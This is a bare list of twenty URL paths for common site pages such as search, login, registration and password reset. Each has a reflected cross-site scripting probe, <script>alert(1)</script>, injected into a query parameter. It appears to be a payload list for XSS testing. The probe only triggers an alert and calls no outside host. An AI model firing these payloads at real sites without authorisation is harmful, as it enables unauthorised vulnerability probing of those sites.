1. /search?q=<script>alert(1)</script>
2. /contact?message=<script>alert(1)</script>
3. /about-us?section=<script>alert(1)</script>
4. /blog/post?id=<script>alert(1)</script>
5. /login?username=<script>alert(1)</script>
6. /register?username=<script>alert(1)</script>
7. /profile?id=<script>alert(1)</script>
8. /reset-password?email=<script>alert(1)</script>
9. /news/article?id=<script>alert(1)</script>
10. /events/calendar?date=<script>alert(1)</script>
11. /products/item?id=<script>alert(1)</script>
12. /services/overview?section=<script>alert(1)</script>
13. /faq/question?id=<script>alert(1)</script>
14. /terms-of-service?section=<script>alert(1)</script>
15. /privacy-policy?section=<script>alert(1)</script>
16. /feedback?message=<script>alert(1)</script>
17. /testimonials?id=<script>alert(1)</script>
18. /careers/job?id=<script>alert(1)</script>
19. /partners/overview?id=<script>alert(1)</script>
20. /deals/item?id=<script>alert(1)</script>
